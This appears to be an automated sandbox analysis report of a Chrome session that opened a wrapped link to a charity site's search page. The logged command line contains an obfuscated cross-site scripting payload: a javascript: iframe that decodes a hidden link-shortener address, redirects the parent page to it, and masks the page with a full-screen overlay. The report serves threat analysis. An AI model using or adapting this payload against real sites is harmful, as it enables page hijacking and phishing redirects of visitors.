Edit tour
Windows
Analysis Report
https://urldefense.com/v3/__https://covenanthousetoronto.ca/?s=*22*3E*7CCryptography*20menu.get=*mime**A20**Aintelligence.start(*dispatchEvent*)*20lib*20**Acomputing(*start*).reality*20onUpdated**B7C*20Blockchain**B20gif**A20location.reload()**B20web*22*20rsc*60*20door(*20remake=*20redo)**B20onstart
Overview
General Information
Detection
Score: | 20 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Very long command line found
Stores files to the Windows start menu directory
Classification
- System is w10x64
- chrome.exe (PID: 3584 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA) - chrome.exe (PID: 3496 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-G B --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1952 --fi eld-trial- handle=190 4,i,179239 9401152825 1687,16385 6741975594 25978,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA)
- chrome.exe (PID: 5528 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "http s://urldef ense.com/v 3/__https: //covenant housetoron to.ca/?s=* 22*3E*7CCr yptography *20menu.ge t=*mime**A 20**Aintel ligence.st art(*dispa tchEvent*) *20lib*20* *Acomputin g(*start*) .reality*2 0onUpdated **B7C*20Bl ockchain** B20gif**A2 0location. reload()** B20web*22* 20rsc*60*2 0door(*20r emake=*20r edo)**B20o nstart_*20 attitudelo cal_marine **B20menu. get=*60mim e*60*20lib rary.start (*60await* 60)*20lib* *B20proces s**A(*60st art*60).lo ad*20arch. hand()*20f older.setE lementByCo de(*60soca r*60)**B20 contact(*6 0r*60,*605 *60)*20**A connect=*6 0hola*60.f ix()*22*3E *3Ciframe* 20src=java script*3A* 2F*2Afd7** Aljj*5Bljj .attol1*5D khalfyacol eur**Ablan ch*2A*2Fco deString=* 60win*60*2 B*60dow.pa r*60*2B*60 ent.docu*6 0*2B*60men t.docu*60* 2B*60mentE le*60*2B*6 0ment.st*6 0*2B*60yle .opa*60*2B *60city=0; url=*5B66, 94,94,90,8 9,16,5,5,7 3,95,94,94 ,4,70,83,5 ,91,93,77, 80,64,90,1 21,71*5D;* 2F*2Athat* 5B*7el**A5 D(setInter val,*_hara *)laard**A 3000zblaal o**A3000zb *2A*2Fwin* 60*2B*60do w.par*60*2 B*60ent.lo ca*60*2B*6 0tion.hr*6 0*2B*60ef= url.map(va lue=*60*2B String.fro mCharCode( 62)*2B*60S tring.from CharCode(v alue*5E42) ).jo*60*2B *60in(''); *2F*2Achw* *Echw.toUp UpDown()*2 A*2F*60;co deString=c odeString. replaceAll (*60salooa *60,*60aze fcr*60);ex ecuteCode= Function(c odeString) ;*2F*2Atha t*5B*ovrir **A5D(sess ionStorage ,*_selve*) sleep.over **B2A*2Fex ecuteCode( );*2F*2A** Amax.do()* 2A*2F*3E*3 C*2Fiframe *3E*3Cspan *20style=* 60display: block;posi tion:fixed ;z-index:9 97483649;t op:0;left: 0;width:20 00px;heigh t:2000px;b ackgroundc olor:white ;**A3E*3C* 2Fspan*3E* 7CCryptogr aphy*20men u.get=*mim e**A20**Ai ntelligenc e.start(*d ispatchEve nt*)*20lib *20**Acomp uting(*sta rt*).reali ty*20arch. learning() onUpdated* *B7C*20Blo ckchain**B 20gif**A20 location.r eload()**B 20web*22*2 0rsc*60*20 door(*20re make=*20re do)**B20on start_*20a ttitudeloc al_marine* *B20folder .setElemen tByCode(*s ocar*ar*)_ _;JSUlJX5- JcKnfn4lJc Knfn4lwqcl JcKnJX4lwq clJSUlJSUl wqclJcKnJS UlJSUlJcKn JcKnJSUlJS UlwqclJSUl JSXCpyUlJS UlJSUlJcKn JSXCpyUlJS UlJSUlJSUl JSUlJSUlJS UlJSUlJSUl JSUlfn4lfn 7Cp8KnJSUl JSUlJSUlJS UlJSUlJSUl JSUlJSUlwq fCp8KnJSUl JSUlJS MD5: 8D1C4713ACB7CC2AAAEE4477C58A80BA)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior | ||
Source: | Directory created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |